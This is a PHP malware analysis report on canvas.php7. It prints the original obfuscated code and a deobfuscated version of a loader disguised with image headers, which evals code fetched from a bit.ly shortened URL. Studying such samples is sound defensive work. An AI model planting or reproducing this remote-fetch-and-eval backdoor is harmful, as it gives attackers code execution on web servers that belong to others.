PHP Malware Analysis

Filename: canvas.php7

Tags

URLs
Execution
  • eval
Files
  • file_get_contents

Deobfuscated code

JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90
GIF89a=<?php
echo eval("?>" . file_get_contents("https://bit.ly/3e06DyR"));
?>



Original code

JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 90
GIF89a=<?php
/*   __________________________________________________
    |  Obfuscated by YAK Pro - Php Obfuscator  2.0.11  |
    |              on 2021-12-30 00:28:02              |
    |    GitHub: https://github.com/pk-fr/yakpro-po    |
    |__________________________________________________|
*/
echo eval("\x3f\76" . file_get_contents("\x68\x74\164\x70\163\x3a\57\57\142\151\x74\x2e\154\171\57\63\145\x30\66\104\171\x52"));
?>